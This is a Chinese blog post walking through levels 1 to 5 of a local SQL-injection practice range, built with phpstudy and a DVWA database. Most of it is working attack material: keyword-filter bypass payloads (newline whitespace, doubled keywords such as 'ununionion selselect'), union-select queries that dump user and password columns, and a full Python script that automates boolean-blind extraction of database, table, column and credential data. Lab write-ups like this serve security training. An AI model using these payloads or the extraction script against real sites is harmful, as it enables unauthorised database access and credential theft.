sqli.bypass靶场本地小皮环境(1-5关)

最新推荐文章于 2024-06-25 15:18:35 发布
最新推荐文章于 2024-06-25 15:18:35 发布
阅读量1.2k 收藏 10
点赞数 19
文章标签: 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyy8910599download/article/details/136054997
版权

1、第一关

http://sqli.bypass/index1.php

单引号报错id=1'

双引号正常id=1'',应该是单引号闭合

id=1'--+注释符用不了,%20和+都用不了

%0a可以用

没有报错,用布尔盲注,POC:id=1'%0aand%0asubstr('ss',1,1)='s'%0aand%0a'1'='1 

脚本跑数据比较方便

import string
from time import time, sleep

import requests

numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True
    # 获取正确返回内容长度
    url = "http://sqli.bypass/index1.php?id=1'%0a"
    list1 = numbers + letters2 + fuhao
    # 获取数据库名
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')%0aand%0a'1'='1"
            res = requests.get(url_db)
            if "Your Login name:admin" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取所有表名
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')%0aand%0a'1'='1"
            num += 1
            res = requests.get(url_db)
            if "Your Login name:admin" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")
    # 获取users表所有字段
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='users')),{p},1)='{a}')%0aand%0a'1'='1"
            num += 1
            res = requests.get(url_db)
            if "Your Login name:admin" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # 换行
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a
    # 获取所有账号
    users = ""
    print(f"所有账号密码数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                url_db = url + f"and(substr((selEcT(group_concat(user,':',password))from({tables})),{p},1)={a})%0aand%0a'1'='1"
            else:
                url_db = url + f"and(substr((selEcT(group_concat(user,':',password))from({tables})),{p},1)='{a}')%0aand%0a'1'='1"
            num += 1
            res = requests.get(url_db)
            if "Your Login name:admin" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'
                users = f"{users}{a}"
                print(a, end='')
                num = 0

2、第二关

输入1查询,抓包

应该还是单引号闭合,and和or被过滤

试一下like,没被过滤

POC:id=-1'+union+select+1,2,3,4,5,6,7,'13

id=-1'+union+select+1,2,3,4,database(),6,7,'13 

-1' union select 1,2,3,4,(select group_concat(table_name) from infORmation_schema.tables where table_schema='dvwa'),6,7,'13

id=-1' union select 1,2,3,4,(select group_concat(column_name) from infORmation_schema.columns where table_schema='dvwa'+AND+table_name='users'),6,7,'13

id=-1' union select 1,2,3,4,(select group_concat(user,'~',passwOrd) from dvwa.users),6,7,'13

3、第三关

单引号闭合

8列数据

显示位4和5

id=-1' union select 1,2,3,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()),6,7,8--+

id=-1' union select 1,2,3,database(),(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' aandnd table_name='users'),6,7,8--+

and和or替换为空了,可以双写绕过

id=-1' union select 1,2,3,database(),(select group_concat(user,'~',password) from dvwa.users),6,7,8--+

4、第四关

和前年一样也是单引号闭合,看下过滤了啥

id=-1' union select 1,2,3,4,5,6,7,8--+

union和select没过滤,可以查到显示位

提示检测到sql注入

id=-1' union select 1,2,3,database(),5,6,7,8--+

这个检测and和or,所以information_schema里包含了or没法用了

id=-1' union select 1,2,3,user(),version(),6,7,8--+

5、第五关

单引号有报错

还是单引号闭合

id=1' union select 1,2,3,4,5,6,7,8--+

报错了,应该是啥被过滤掉了,试试双写绕过

id=-1' ununionion selselect ect 1,2,3,4,5,6,7,8--+

那就好办了

id=-1' ununionion selselect ect 1,2,3,datadatabasebase(),5,6,7,8--+

id=-1' ununionion selselect ect 1,2,3,4,(selselect ect group_concat(table_name) frofromm infoorrmation_schema.tables w where here table_schema like '%dvwa'),6,7,8--+

id=-1' ununionion selselect ect 1,2,3,4,(selselect ect group_concat(column_name) frofromm infoorrmation_schema.columns w where here table_schema like 'dvwa' anandd table_name like '%uusersers'),6,7,8--+

id=-1' ununionion selselect ect 1,2,3,4,(selselect ect group_concat(ususerer,':',passwoorrd) frofromm  uusersers),6,7,8--+

这个参数需要不停的尝试

沧海一粟@星火燎原
关注
  • 19
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-bypass靶场
11-10
sqli-bypass靶场
XSS靶场搭建以及前十详解
GN_QT的博客
07-31 314
aaa
小皮靶场搭建(DVWA和pikachu)
AaronJJJ的博客
03-25 667
利用phpstudy搭建靶场,DVWA和pikachu
SQLI-Proxy:一个强大的SQL注入检测与防护代理
gitblog_00072的博客
04-05 324
SQLI-Proxy:一个强大的SQL注入检测与防护代理 项目地址:https://gitcode.com/OneSourceCat/sqli-proxy SQLI-Proxy 是一个开源项目,用于帮助开发者和安全人员在Web应用程序中检测并防御SQL注入攻击。这个工具利用了现代网络代理技术和深度数据解析能力,可以实时监控HTTP请求,对潜在的SQL注入漏洞进行智能识别。 技术分析 SQLI-Pr...
基于小皮靶场搭建
Hjdnknd的博客
06-09 477
实验环境一台虚拟机windos(因为搭建的网站是是一个靶场,存在诸多漏洞)Windows版phpstudy下载 - 小皮面板(phpstudy)这是小皮的下载链接打开后进入config文件,将里面文件复制后去掉.dist后缀,再将其打开,修改其中数据: 修改其相应的数据库账户和密码 不知道数据库的可以看这最后访问自己ip 用户admin密码password...
虚拟机环境小皮面板搭建pikachu靶场,并且实现实现物理机的访问。
m0_74273057的博客
05-28 968
虚拟机环境小皮面板搭建pikachu靶场,并且实现实现物理机的访问。
sqli-labs靶场安装
qq_44624916的博客
02-04 442
小皮phpstudy搭建sqli-labs靶场
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs靶场练习wp的配图.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
linux用小皮搭建pikachu靶场网站
Martin-share的博客
01-31 2961
linux用小皮搭建pikachu靶场网站
phpstudy小皮 sqli-libs 靶场搭建
qq_44637753的博客
10-08 1250
phpstudy小皮 sqli-labs 靶场搭建
小皮搭建pikachu靶场魔术引号闭问题
qq_53297395的博客
04-15 2143
记录下今天碰到的这个问题 php.ini的魔术引号这几个配置已经上了但是还是有问题,莫名其妙的报错,对应php5.2.17,换成php5.4就没有这个报错了
pikachu靶场的安装以及使用
热门推荐
Christma1s的博客
03-04 3万+
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。 Pikachu上的漏洞类型列表如下: Burt Force(暴力破解漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行) Files Inclusion(文件包含漏洞) Unsaf...
搭建皮卡丘靶场以及攻略
qq_43766053的博客
02-15 8974
1.使用phpstudy搭建 phpstudy大家直接百度搜索下载,这里推荐使用小皮 2.皮卡丘靶场源代码 大家自行下载,里面还有dvwa靶场的源代码 https://gitee.com/shiyiyy/tools/tree/master/pikachu 3.代码存放位置 下载好源代码后,解压存放在phpstudy安装目录下的www位置, 例如:D:\phpstudy_pro\WWW 4.使用phpstudy打开 首先就是首页打开apache和mysql服务 然后大家看左边,点进去网站,在左上方有一个创建网
web安全
weixin_48381005的博客
04-04 997
web安全 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 一共有十个模块: 暴力
搭建Pikachu靶场出现的问题
weixin_48584917的博客
05-27 1万+
在Windows搭建pikachu出现的两个问题,今天带大家来解决一下 ①PHPstudy(小皮面板)出现80端口被占用 ②Pikachu出现数据连接失败,请仔细检查inc/config.inc.php的配置的问题 准备的工具:Everything ①: 当初启动Apache服务时会出现端口80被占用,此时最好是修改端口号 使用Everything搜索:httpd.conf 打开路径短一点的那个文件,也就是路径*\Apache2.4.39\conf 现在使用记事本打开或者Nodepad++ 按Ctrl
Java面试题:Redis为什么速度快
最新发布
qq_55630615的博客
06-25 187
因为Redis是纯内存操作,执行速度非常快,性能的瓶颈是网络延迟而非执行速度I/O多路复用模型主要就是实现了高效的网络请求。
sqli-labs靶场15
07-28
SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap -u <target URL> --dbs ``` 这将列出数据库列表。接下来,你可以使用以下命令枚举数据表: ``` sqlmap -u <target URL> -D <database name> --tables ``` 最后,你可以使用以下命令读取数据表中的数据: ``` sqlmap -u <target URL> -D <database name> -T <table name> --dump ``` 请注意,在实际渗透测试中,使用SQLMap和其他工具需要遵循道德准则和法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值